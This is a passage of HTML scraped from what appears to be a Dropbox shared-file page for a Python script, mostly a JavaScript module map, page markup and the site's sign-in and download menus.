"external/codemirror-0.91/contrib/php/js/parsephp": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/codemirror-0.91/contrib/php/js/parsephp-vflmgjmJA", "external/codemirror-0.91/js/parsejavascript": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/codemirror-0.91/js/parsejavascript-vfl7iPw7q", "endscript": "endscript-vflBQ8JoK", "require_config": "require_config-vflsfoytV", "external/prettify/lang-css": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/prettify/lang-css-vflkUNl-k", "pseudo_local_storage": "pseudo_local_storage-vflFDeRIP", "sharing/team_shared_folder_invite_controller": "sharing/team_shared_folder_invite_controller-vflE8hqa2", "core/ordered_dictionary": "core/ordered_dictionary-vflO3CZPU", "emstring": "emstring-vflAlxBbx", 
"external/timeline/timeline_2.3.0/timeline_js/timeline-bundle": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/timeline/timeline_2.3.0/timeline_js/timeline-bundle-vflXwgj96", "widgets/title_bubble": "widgets/title_bubble-vflZ77JrI", "annotation": "annotation-vfl2oQO3-", "photos/photo_obj": "photos/photo_obj-vflE3I58y", "external/codemirror-0.91/contrib/sql/js/parsesql": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/codemirror-0.91/contrib/sql/js/parsesql-vfljZKTid", "external/iphone": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/iphone-vflkl7_tc", "file_preview_pending": "file_preview_pending-vfl9HiC8G", "dropins_sdk/v2": "dropins_sdk/v2-vfli5tBlv", "dropins_sdk/v1": "dropins_sdk/v1-vflWYhn4L", "external/prettify/lang-sql": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/prettify/lang-sql-vfloOXjgL", "db_local_storage": "db_local_storage-vflBabw4f", "external/codemirror-0.91/contrib/xquery/js/tokenizexquery": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/codemirror-0.91/contrib/xquery/js/tokenizexquery-vflLuA8go", "widgets/register_form": "widgets/register_form-vflzNfkZ-", "photos/photos": "photos/photos-vflhFXxqS", "tests/cash_util_test": "tests/cash_util_test-vfl5r46ED", "langs_page": "langs_page-vflN12vXg", "sharing/contact_types": "sharing/contact_types-vfli65w_m", "jquery_extensions": "jquery_extensions-vflG0VzrO", "external/codemirror-0.91/js/parsehtmlmixed": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/codemirror-0.91/js/parsehtmlmixed-vflobyvkb", "admin/server_vars": "admin/server_vars-vflK1mPMM", "external/prettify/lang-hs": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/prettify/lang-hs-vflmhToOJ", "sharing/sf_views": "sharing/sf_views-vflxJ4fUe", "external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/vi/labellers": 
"https://dt8kf6553cww8.cloudfront.net/static/javascript/external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/vi/labellers-vflXbVxFU", "exc_reporting": "exc_reporting-vfloiXfLS", "widgets/role_picker": "widgets/role_picker-vflYAjnWi", "developers_sdk_saver_logger": "developers_sdk_saver_logger-vflUrmov0", "external/codemirror-0.91/contrib/php/js/parsephphtmlmixed": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/codemirror-0.91/contrib/php/js/parsephphtmlmixed-vfl6MWgTz", "tests/ajax_form": "tests/ajax_form-vfldqro8r", "widgets/tree_view": "widgets/tree_view-vflBqc3lQ", "locale_selector": "locale_selector-vflMU0wx8", "fileops": "fileops-vflvQM6Hw", "teams/teams_pricing_slider": "teams/teams_pricing_slider-vflLQI-97", "forms": "forms-vflgjMygq", "video_util": "video_util-vfl6MFffS", "external/codemirror-0.91/js/util": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/codemirror-0.91/js/util-vflJ6aj2l", "kwargs": "kwargs-vflVKZLC7", "control/install": "control/install-vflQ5p5Bx", "logger": "logger-vflXdXO8C", "sharing/util": "sharing/util-vflNBMCet", "external/jquery.qrcode.min": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/jquery.qrcode.min-vflrxBXjD", "external/prettify/lang-vb": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/prettify/lang-vb-vfl1vaEjC", "widgets/ajax_form": "widgets/ajax_form-vflOkA10-", "drag_scroll": "drag_scroll-vfleJIXp-", "external/sorttable": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/sorttable-vflvQVjIl", "tests/cache_test": "tests/cache_test-vflfG9u5X", "user_marketing_stories": "user_marketing_stories-vflOml1tB", "shared_util": "shared_util-vflbBYJxw", "external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/ru/labellers": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/ru/labellers-vfl0a4_sU", "external/codemirror-0.91/contrib/php/js/tokenizephp": 
"https://dt8kf6553cww8.cloudfront.net/static/javascript/external/codemirror-0.91/contrib/php/js/tokenizephp-vfl_6JJjd", "photos/photo_share_page": "photos/photo_share_page-vflPi4FzB", "admin/dmca_dashboard": "admin/dmca_dashboard-vflQxeM6Q", "look3": "look3-vfljTW3FX", "admin/watchdog": "admin/watchdog-vflEwAzxu", "libs": ["https://dt8kf6553cww8.cloudfront.net/static/javascript/compiled/libs-mini-vfljfBv6h", "https://www.dropboxstatic.com/static/javascript/compiled/libs-mini-vfljfBv6h"], "external/codemirror-0.91/css/font": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/codemirror-0.91/css/font-vflls2Gft", "external/codemirror-0.91/js/unittests": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/codemirror-0.91/js/unittests-vflG9sKld", "teams/marketo_form": "teams/marketo_form-vflLSLmWN", "browse/browse_jump": "browse/browse_jump-vfl8RsCpa", "file_preview": "file_preview-vflgwX8K4", "mobile/shmodel_preview": "mobile/shmodel_preview-vflU7rctL", "photos/photo_timeline": "photos/photo_timeline-vflFVoYoE", "photos/photos_logger": "photos/photos_logger-vflplsrvJ", "tests/kwargs": "tests/kwargs-vfl5CQnUz", "teams/member_requests_confirm_modal": "teams/member_requests_confirm_modal-vfljfS5rk", "external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/se/timeline": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/se/timeline-vfl-hw8Ma", "annotate_qual": "annotate_qual-vflg9l-u6", "widgets/locale_selector_modal": "widgets/locale_selector_modal-vflzz6iBj", "teams/team": "teams/team-vflqRIoNT", "payments": "payments-vfluB-62X", "touch_util": "touch_util-vflrKz8Fl", "external/timeline/timeline_2.3.0/timeline_js/timeline-api": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/timeline/timeline_2.3.0/timeline_js/timeline-api-vflJybO4S", "async": "async-vflXeTSiy", "sharing/hidden_input": "sharing/hidden_input-vflVJ548v", "external/swfobject": 
"https://dt8kf6553cww8.cloudfront.net/static/javascript/external/swfobject-vfljC7EvC", "mobile/links": "mobile/links-vflr-YzbZ", "sharing/sf_access_type": "sharing/sf_access_type-vflwAzRom", "templates": "templates-vfly8tgQG", "developers_dropins2": "developers_dropins2-vflsKjiX3", "widgets/sprite": "widgets/sprite-vfl3x8dTC", "custom_domains": "custom_domains-vfleQ1jfV", "external/prettify/lang-lisp": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/prettify/lang-lisp-vflNhNa5v", "sharing/sharing": "sharing/sharing-vflQ1ZNjy", "external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/it/labellers": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/it/labellers-vflzplwsL", "snapshots": "snapshots-vflhaA8AM", "browse/browse_clipboard": "browse/browse_clipboard-vflrXqP0Z", "payments_util": "payments_util-vfl14YTJj", "external/prettify/prettify": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/prettify/prettify-vflcJv8xF", "browse/browse_keys": "browse/browse_keys-vflBzCYBF", "bubble_picker": "bubble_picker-vflqU0JPx", "admin/packrat": "admin/packrat-vflv9Kfem", "home": "home-vflg07T9o", "external/underscore": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/underscore-vfl7K8tzR", "db_dropdown": "db_dropdown-vflVNdhsd", "admin/fix_samsung_deletions": "admin/fix_samsung_deletions-vflAmjzWe", "browse/file_search": "browse/file_search-vfl0EBmCt", "notification_feed": "notification_feed-vflnP4VQT", "browse/update_events": "browse/update_events-vfllZylWA", "external/jquery_ui": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/jquery_ui-vfl9qjowS", "sharing/forms": "sharing/forms-vflN2zJt1", "control/login_and_register": "control/login_and_register-vfliCFz4B", "teams/update_billing_info_modal": "teams/update_billing_info_modal-vfl4BDiVp", "external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/tr/timeline": 
"https://dt8kf6553cww8.cloudfront.net/static/javascript/external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/tr/timeline-vflkm5fNv", "external/iphonelib": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/iphonelib-vfl2emqyU", "external/jobvite": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/jobvite-vflBqjvlu", "external/jquery_noconflict": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/jquery_noconflict-vflrGziQ2", "external/codemirror-0.91/js/mirrorframe": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/codemirror-0.91/js/mirrorframe-vflmUSSe7", "thumb_loader": "thumb_loader-vfl5A5xYO", "photos/photo_collection_obj": "photos/photo_collection_obj-vflAE01ZL", "sharing/options_modal": "sharing/options_modal-vflX-K9Vs", "foshmodal": "foshmodal-vflr0f1pS", "multiaccount_login": "multiaccount_login-vflf-7gDV", "revisions_diff": "revisions_diff-vflNMCtu8", "annotate_face_detections": "annotate_face_detections-vflASD2jD", "external/keymaster": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/keymaster-vflUgLHG5", "external/zxcvbn": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/zxcvbn-vflkO7PKd", "photos/photos_show_faces": "photos/photos_show_faces-vflAgqLDd", "music_selection": "music_selection-vfl8bfKSj", "exclog/asana": "exclog/asana-vflLdHgsB", "qr_connect": "qr_connect-vfl0paeR_", "external/prototype": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/prototype-vflsz33MA", "get_mobile_app": "get_mobile_app-vfloV_R1r", "hi_res": "hi_res-vflKTk4ER", "about": "about-vfli-74Cv", "external/fabric": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/fabric-vflgzn01d", "lightbox": "lightbox-vflMdtPSJ", "multiaccount": "multiaccount-vfliW5hG9", "tests/register_form": "tests/register_form-vfl3iF9kA", "notserver": "notserver-vflCqoJvC", "contacts/cache": "contacts/cache-vfl42NhbZ", 
"external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/fr/timeline": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/fr/timeline-vflOX0C5s", "control/facebook_confirm_modal": "control/facebook_confirm_modal-vflakHH6I", "widgets/login_form": "widgets/login_form-vflL7T5Hx", "components/tabs": "components/tabs-vflmUJE0E", "modal": "modal-vflUWIFh_", "admin/api_app": "admin/api_app-vflA9TLgY", "tests/viewer_tests": "tests/viewer_tests-vflVN5Os7", "tests/i18n_test": "tests/i18n_test-vflWgRLGo", "external/prettify/lang-xq": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/prettify/lang-xq-vfl68ZmQi", "teams/reduce_licenses": "teams/reduce_licenses-vflPXlXnV", "external/require": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/require-vflqlcrZl", "components/bubble_dropdown": "components/bubble_dropdown-vflgr_lIu", "control/hosts": "control/hosts-vflY4dK4Q", "photos/photos_util": "photos/photos_util-vflNZDJ0K", "dropins/mobile_util": "dropins/mobile_util-vflbrKxdu", "ymail_test_page": "ymail_test_page-vfl70hqCk", "cookies": "cookies-vflVBrHPj", "modalflows": "modalflows-vflNNn0lt", "teams/upgrade_to_annual": "teams/upgrade_to_annual-vfl9MQ15E", "annotate_events": "annotate_events-vfl6ahglg", "external/phone_helpers": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/phone_helpers-vflkZ23T7", "external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/es/timeline": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/es/timeline-vflYLnRPJ", "dropins_sdk/ymail": "dropins_sdk/ymail-vflSoQNHR", "client_sso": "client_sso-vflQqdYtm", "dbx_main_page": "dbx_main_page-vflFd7M68", "mobile/lightbox_previews": "mobile/lightbox_previews-vflQupTuU", "external/pdf-js/pdf-mini": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/pdf-js/pdf-mini-vfl0t3_Bz", "dropins/hostsite_generic": 
"dropins/hostsite_generic-vflDCLZ2M", "support": "support-vflb2tPRr", "pairing": "pairing-vfl-MWMHz", "apps": "apps-vflp69OWc", "automata": "automata-vflv9oRHZ", "exclog/exclog2": "exclog/exclog2-vflPMqpgu", "external/h5f.min": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/h5f.min-vflZUjnty", "admin/sfj": "admin/sfj-vflHTVWiw", "teams/domain_notifications_confirm_modal": "teams/domain_notifications_confirm_modal-vflpDDd4b", "widgets/ul_select_menu": "widgets/ul_select_menu-vflxfbRFu", "external/mailcheck": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/mailcheck-vflNl7qw_", "mobile/widgets": "mobile/widgets-vfl2Ko242", "external/highcharts": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/highcharts-vflbJ-B9j", "twitter": "twitter-vflKeXP7o", "dropins/login": "dropins/login-vfl-6H9FK", "external/codemirror-0.91/js/highlight": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/codemirror-0.91/js/highlight-vflbSMPe8", "external/flash_detect": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/flash_detect-vflLuenon", "teams/member_requests_table": "teams/member_requests_table-vfl84tfjf", "prototype_extensions": "prototype_extensions-vflyhf_uw", "browse/browse_util": "browse/browse_util-vfljOogFC", "table_filter": "table_filter-vflfalr2x", "external/colorspin": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/colorspin-vflXAKFcl", "dropins/hostsite_fb": "dropins/hostsite_fb-vfl_fDQOj", "developers_graphs": "developers_graphs-vflnEDkp8", "control/alias_modals": "control/alias_modals-vflJWNYm8", "jquery": ["https://ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min", "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/jquery-vflrOa9og", "https://www.dropboxstatic.com/static/javascript/external/jquery-vflrOa9og"], "external/beautify": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/beautify-vfl1l41LM", "sharing/token_manager": 
"sharing/token_manager-vflvT_YBM", "control/home": "control/home-vflV0E5kL", "automata_console": "automata_console-vflooEKQG", "sharing/token": "sharing/token-vflSgjSkn", "browse/browse_selection": "browse/browse_selection-vflFSIw7I", "mobile": ["https://dt8kf6553cww8.cloudfront.net/static/javascript/compiled/dropbox-mobile-mini-vflc5eZjM", "https://www.dropboxstatic.com/static/javascript/compiled/dropbox-mobile-mini-vflc5eZjM"], "mobile/util": "mobile/util-vflyMKA4I", "admin/restore_paged": "admin/restore_paged-vflYz5lfG", "widgets/text_input_date_picker": "widgets/text_input_date_picker-vflWFSxCC", "annotate_dups": "annotate_dups-vfllJiK0D", "external/codemirror-0.91/js/codemirror": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/codemirror-0.91/js/codemirror-vflSSvLE4", "external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/se/labellers": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/se/labellers-vfl4Q8hfZ", "referral_page": "referral_page-vflPnJVs5", "external/scriptaculous/effects": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/scriptaculous/effects-vflWyM_nb", "bug_reporter": "bug_reporter-vflfMXHB-", "tests/phone_helpers_test": "tests/phone_helpers_test-vflMVdrD0", "dropins_sdk/base": "dropins_sdk/base-vflC7F7sS", "business_two_account_splash": "business_two_account_splash-vfl7kT9xM", "external/tablekit": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/tablekit-vflw6NN60", "viewer": "viewer-vflXzepfD", "file_selection": "file_selection-vfl_phrDQ", "browse/file_types": "browse/file_types-vfl3MgmqO", "teams/domains": "teams/domains-vfl8c-6Ku", "external/codemirror-0.91/js/tokenizejavascript": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/codemirror-0.91/js/tokenizejavascript-vfl1_UxPq", "external/codemirror-0.91/js/parsesparql": 
"https://dt8kf6553cww8.cloudfront.net/static/javascript/external/codemirror-0.91/js/parsesparql-vflQl6y2g", "admin/i18n": "admin/i18n-vfl7ZqJ3M", "developers_toc": "developers_toc-vfl9e3dIF", "widgets/act_as_block": "widgets/act_as_block-vflwTt4T5", "external/prettify/lang-vhdl": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/prettify/lang-vhdl-vfleKIBCr", "sharing/autocompleter_team_tokenizer": "sharing/autocompleter_team_tokenizer-vfluYtb1L", "links/recent_links": "links/recent_links-vfl3xd0rU", "external/purl": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/purl-vflcjHlOb", "components/input": "components/input-vfl-BS9Te", "external/codemirror-0.91/contrib/java/js/tokenizejava": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/codemirror-0.91/contrib/java/js/tokenizejava-vfljAyJq1", "external/prettify/lang-lua": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/prettify/lang-lua-vflGEdkRV", "widgets/date_picker_input": "widgets/date_picker_input-vflZieP44", "external/codemirror-0.91/js/parsecss": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/codemirror-0.91/js/parsecss-vflw77HTL", "browse/browse_drag": "browse/browse_drag-vflbcQyyl", "external/prettify/lang-proto": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/prettify/lang-proto-vflhz79A8", "external/prettify/lang-go": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/prettify/lang-go-vflRea47Z", "facebook_oauth": "facebook_oauth-vfl9SOPOx", "external/codemirror-0.91/contrib/lua/js/parselua": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/codemirror-0.91/contrib/lua/js/parselua-vflrki2Pl", "external/prettify/lang-wiki": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/prettify/lang-wiki-vflbk7KSp", "external/moxie": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/moxie-vflSD4pjN", "external/codemirror-0.91/contrib/ometa/js/tokenizeometa": 
"https://dt8kf6553cww8.cloudfront.net/static/javascript/external/codemirror-0.91/contrib/ometa/js/tokenizeometa-vflDe6cS3", "request_watcher": "request_watcher-vfl69rFp3", "external/codemirror-0.91/contrib/scheme/js/tokenizescheme": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/codemirror-0.91/contrib/scheme/js/tokenizescheme-vflVhaZk4", "external/prettify/lang-yaml": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/prettify/lang-yaml-vfl4DZ_ky", "widgets/bubble": "widgets/bubble-vflHBju3g", "dom_util": "dom_util-vfl9c-jXO", "control/email_verification": "control/email_verification-vfl7giC4Z", "external/codemirror-0.91/js/tokenize": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/codemirror-0.91/js/tokenize-vflwAgUMq", "dropbox": ["https://dt8kf6553cww8.cloudfront.net/static/javascript/compiled/dropbox-mini-vflObOMH3", "https://www.dropboxstatic.com/static/javascript/compiled/dropbox-mini-vflObOMH3"], "external/jquery_payment": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/jquery_payment-vflV9_lEJ", "links/merged_links": "links/merged_links-vfl3b11N5", "teams/add_licenses": "teams/add_licenses-vflia683v", "external/braintree-data": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/braintree-data-vflYTjGak", "components/tooltip": "components/tooltip-vflbjscZ8", "tests/notserver": "tests/notserver-vflOHAd4s", "connect_v3_mobile": ["https://dt8kf6553cww8.cloudfront.net/static/javascript/compiled/connect-v3-mobile-mini-vfld3rfmR", "https://www.dropboxstatic.com/static/javascript/compiled/connect-v3-mobile-mini-vfld3rfmR"], "sharing/invite_form_controller": "sharing/invite_form_controller-vflY3HbLC", "admin/email": "admin/email-vfltDegkr", "control/downloading": "control/downloading-vfl6Ta2nX", "exclog/exclog2_view": "exclog/exclog2_view-vflK4DjLs", "teams/domain_invites_user_modal": "teams/domain_invites_user_modal-vflOS_lUb", "admin/gandalf": "admin/gandalf-vflx_j5J7", 
"control/sso_login_checks": "control/sso_login_checks-vflk7QEq3", "admin/collection": "admin/collection-vflCfKPPn", "scroll": "scroll-vflIme-dS", "external/scriptaculous/controls": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/scriptaculous/controls-vflMfBykE"};</script><script src="https://dt8kf6553cww8.cloudfront.net/static/javascript/compiled/require-vflSK92_s.js" type="text/javascript"></script><script type="text/javascript">requirejs(['dropbox'])</script><style type="text/css">.hny-dxvr { display: none; }</style><!--[if lt IE 9]><script src="/static/javascript/external/html5shiv.js"></script><![endif]-->
<style type="text/css" media="screen">
html {
overflow: auto;
}
</style>
<link href="https://dt8kf6553cww8.cloudfront.net/static/css/shmodel_print-vflWHY0im.css" type="text/css" rel="stylesheet" /><link href="https://dt8kf6553cww8.cloudfront.net/static/css/sprite-div-vflt7CFDK.css" type="text/css" rel="stylesheet" /><link href="https://dt8kf6553cww8.cloudfront.net/static/css/syntax-vfljUnWvZ.css" type="text/css" rel="stylesheet" /><script>
if (self != top) {
top.location.replace(self.location.href);
setTimeout(function() {
document.body.innerHTML = (
"<img src='https://www.dropbox.com/static/images/logo.png' onClick='top.location.href=window.location.href' />");
}, 1);
}
</script></head><body class="en file-preview-body shmodel-body deferred-resources"><div style="display: none;" id="db-modal-simple_modal" class="db-modal-wrapper"><div class="db-modal-overlay"></div><div class="db-modal"><div class="db-modal-box"><a href="#" class="db-modal-x"></a><h2 class="db-modal-title"><div class="db-modal-title-text"></div></h2><div class="db-modal-content"><div class="simple-modal-content"></div><div class="db-modal-buttons"><span class="ajax-loading-indicator"><img src="https://dt8kf6553cww8.cloudfront.net/static/images/icons/ajax-loading-small-vfl3Wt7C_.gif" /></span><input type="button" class="confirm-button freshbutton-blue " value="Confirm" /><input type="button" class="cancel-button freshbutton-silver" value="Cancel" /></div></div></div></div></div><div style="display: none;" id="modal-behind"></div><div style="display: none;" id="modal"><div id="modal-box"><a href="#" id="modal-x" onclick="javascript: Modal.hide(null, false, true); Event.stop(event); return false;"></a><h2 id="modal-title"></h2><div id="modal-content"></div></div></div><div style="display: none;" id="modal-overlay"></div><div style="display:none" id="grave-yard"></div><div style="display:none" id="trash-can"></div><script type="text/template" id="tutorial_nav_bubble_tmpl"><div class="tutorial-bubble-content"><a class="tutorial-bubble-x-link"><img src="/static/images/x-small-active.png" class="tutorial-bubble-x-img" /></a><h1 class="tutorial-bubble-title"><%= title %></h1><p class="tutorial-bubble-body"><%= body %></p><a class="tutorial-bubble-button <%= button_class %>"><%= button_text %></a></div></script><div id="floaters"></div><div style="display: none;" class="external-drop-indicator top"></div><div style="display: none;" class="external-drop-indicator right"></div><div style="display: none;" class="external-drop-indicator bottom"></div><div style="display: none;" class="external-drop-indicator left"></div><div id="notify-wrapper"><span style="display: none;" 
id="notify"><span id="notify-msg">Sorry, there was a problem loading this page.</span></span></div><div id="outer-frame"> <div style="display: none;" id="db-modal-locale-selector-modal" class="db-modal-wrapper"><div class="db-modal-overlay"></div><div class="db-modal"><div class="db-modal-box"><a href="#" class="db-modal-x"></a><h2 class="db-modal-title"><div class="db-modal-title-text">Choose a language</div></h2><div class="db-modal-content"><table><tr><td><ul><li><a data-locale="id" class="locale-option">Bahasa Indonesia</a></li><li><a data-locale="ms" class="locale-option">Bahasa Malaysia</a></li><li><a data-locale="de" class="locale-option">Deutsch</a></li><li><a data-locale="en" class="locale-option">English</a></li><li><a data-locale="es_ES" class="locale-option">Español (España)</a></li><li><a data-locale="es" class="locale-option">Español (Latinoamérica)</a></li><li><a data-locale="fr" class="locale-option">Français</a></li><li><a data-locale="it" class="locale-option">Italiano</a></li></ul></td><td><ul><li><a data-locale="pl" class="locale-option">Polski</a></li><li><a data-locale="pt_BR" class="locale-option">Português (Brasil)</a></li><li><a data-locale="ru" class="locale-option">Pусский</a></li><li><a data-locale="zh_CN" class="locale-option">中文(简体)</a></li><li><a data-locale="zh_TW" class="locale-option">中文(繁體)</a></li><li><a data-locale="ja" class="locale-option">日本語</a></li><li><a data-locale="ko" class="locale-option">한국어</a></li></ul></td></tr></table></div></div></div></div><div id="page-content"><div class="nav-header"><a href="//www.dropbox.com?src=shmodel" target="_top" class="logo"><img src="https://dt8kf6553cww8.cloudfront.net/static/images/header/header_logo_shmodel-vflsZ7QsE.png" alt="Dropbox" data-hi-res="https://dt8kf6553cww8.cloudfront.net/static/images/header/header_logo_shmodel@2x-vflvJX68X.png" /></a> <div class="filename shmodel-filename"><span id="pyxl9201789708051613151"></span></div> <div class="buttons"><a href="#" 
class="freshbutton-blue freshdropdown-button" onclick="SharingModel.toggle_dropdown(event, $("download-menu"), $("download-menu-button"))" id="download-menu-button">Download<img src="https://dt8kf6553cww8.cloudfront.net/static/images/icons/icon_spacer-vflN3BYt2.gif" class=" sprite sprite_web s_web_arrow_white" /></a><div style="display: none;" id="download-menu" class="chat-bubble freshdropdown-menu"><ul><li><a href="https://dl.dropboxusercontent.com/s/zdgnrgum7zs8nal/RaspberryPiUptime.py?dl=1&token_hash=AAFkDXJudM03AvF7JseUg8f4VJDlIfpAl9EIIu5bwRXIkw" id="download_button_link" onclick="FreshDropdown.hide_all()"><div class="sprite-div"><div class="sprite-frame small icon-left"><img src="https://dt8kf6553cww8.cloudfront.net/static/images/icons/icon_spacer-vflN3BYt2.gif" class=" sprite sprite_web s_web_download_arrow" /></div><div class="sprite-text">Direct download</div></div></a></li><li><a class="a2md-button" onclick="SharingModel.show_c2d_modal(); return false;" id="add_to_my_dropbox_link"><div class="sprite-div"><div class="sprite-frame small icon-left"><img src="https://dt8kf6553cww8.cloudfront.net/static/images/icons/icon_spacer-vflN3BYt2.gif" class=" sprite sprite_web s_web_dropbox" /></div><div class="sprite-text">Copy to my Dropbox</div></div></a></li></ul><div class="chat-bubble-arrow-border"></div><div class="chat-bubble-arrow"></div></div><a href="#" class="freshbutton-lightblue freshdropdown-button" onclick="SharingModel.toggle_dropdown(event, $("non-owner-menu"), $("non-owner-menu-button"))" id="non-owner-menu-button"><img src="https://dt8kf6553cww8.cloudfront.net/static/images/icons/icon_spacer-vflN3BYt2.gif" class=" sprite sprite_web s_web_more" /></a><div style="display: none;" id="non-owner-menu" class="chat-bubble freshdropdown-menu"><ul><li><a id="print-button"><div class="sprite-div"><div class="sprite-frame small icon-left"><img src="https://dt8kf6553cww8.cloudfront.net/static/images/icons/icon_spacer-vflN3BYt2.gif" class=" sprite sprite_web 
s_web_printer" /></div><div class="sprite-text">Print</div></div></a></li></ul><div class="chat-bubble-arrow-border"></div><div class="chat-bubble-arrow"></div></div> <div id="account-header"><ul class="nav"><li id="top-login"><div id="top-login-wrapper"><a href="/login" id="login-hover-link">Sign in<img src="https://dt8kf6553cww8.cloudfront.net/static/images/icons/icon_spacer-vflN3BYt2.gif" style="padding: 0; margin-left: 5px; margin-top: -1px;" class="s_web_arrow-down-blue link-img sprite sprite_web" id="login-hover-dropdown-icon" /></a><div id="login-hover-cont" class="offscreen chat-bubble"><form action="https://www.dropbox.com/login?cont=https%3A//www.dropbox.com/s/zdgnrgum7zs8nal/RaspberryPiUptime.py" novalidate="novalidate" method="post"><input type="hidden" name="t" value="8j8BaT-RNXpqPrZXN5bmAKpD" /><div class="sick-input small"><label for="login_email_elm">Email</label><input type="email" id="login_email_elm" name="login_email" tabindex="1" /></div><div class="sick-input small"><label for="login_password_elm">Password</label><input type="password" id="login_password_elm" name="login_password" tabindex="2" /></div><p style="margin-bottom: 0.5em; line-height: 28px;" class="top-login-remember-me"><input style="vertical-align: middle; margin-left: 0;" checked="True" name="remember_me" class="no-border" type="checkbox" id="remember_me" tabindex="3" /><label style="vertical-align: middle; cursor: pointer; " for="remember_me">Remember me</label><input tabindex="4" type="submit" class="freshbutton-blue" value="Sign in" id="toplogin-submit" /><input type="hidden" name="cont" value="https://www.dropbox.com/s/zdgnrgum7zs8nal/RaspberryPiUptime.py" /></p><p class="create-account"><a href="/register" id="login-create-an-account">Sign up for Dropbox</a></p></form><div class="chat-bubble-arrow-border"></div><div class="chat-bubble-arrow"></div></div></div></li></ul></div></div></div><div id="shmodel-content-area"><div id="default-content"><img 
